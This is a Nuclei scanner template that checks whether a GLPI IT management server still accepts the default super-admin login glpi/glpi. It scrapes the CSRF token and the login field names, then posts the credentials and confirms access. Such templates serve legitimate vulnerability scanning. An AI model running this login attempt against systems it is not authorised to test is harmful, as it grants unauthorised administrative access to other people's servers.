id: glpi-default-login

info:
  name: GLPI Default Login
  author: andysvints
  severity: high
  tags: glpi,default-login
  description: GLPI default login credentials were discovered. GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled.
  reference: https://glpi-project.org/
  classification:
    cwe-id: CWE-798

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /front/login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        {{name}}={{user}}&{{password}}={{pass}}&auth=local&submit=Submit&_glpi_csrf_token={{token}}

    attack: pitchfork
    payloads:
      user:
        - glpi
      pass:
        - glpi

    extractors:
      - type: regex
        name: token
        part: body
        internal: true
        group: 1
        regex:
          - "hidden\" name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)\""

      - type: regex
        name: name
        part: body
        internal: true
        group: 1
        regex:
          - "type=\"text\" name=\"([0-9a-z]+)\" id=\"login_name\" required=\"required\""

      - type: regex
        name: password
        part: body
        internal: true
        group: 1
        regex:
          - "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\""

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<title>GLPI - Standard Interface</title>'

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/03/03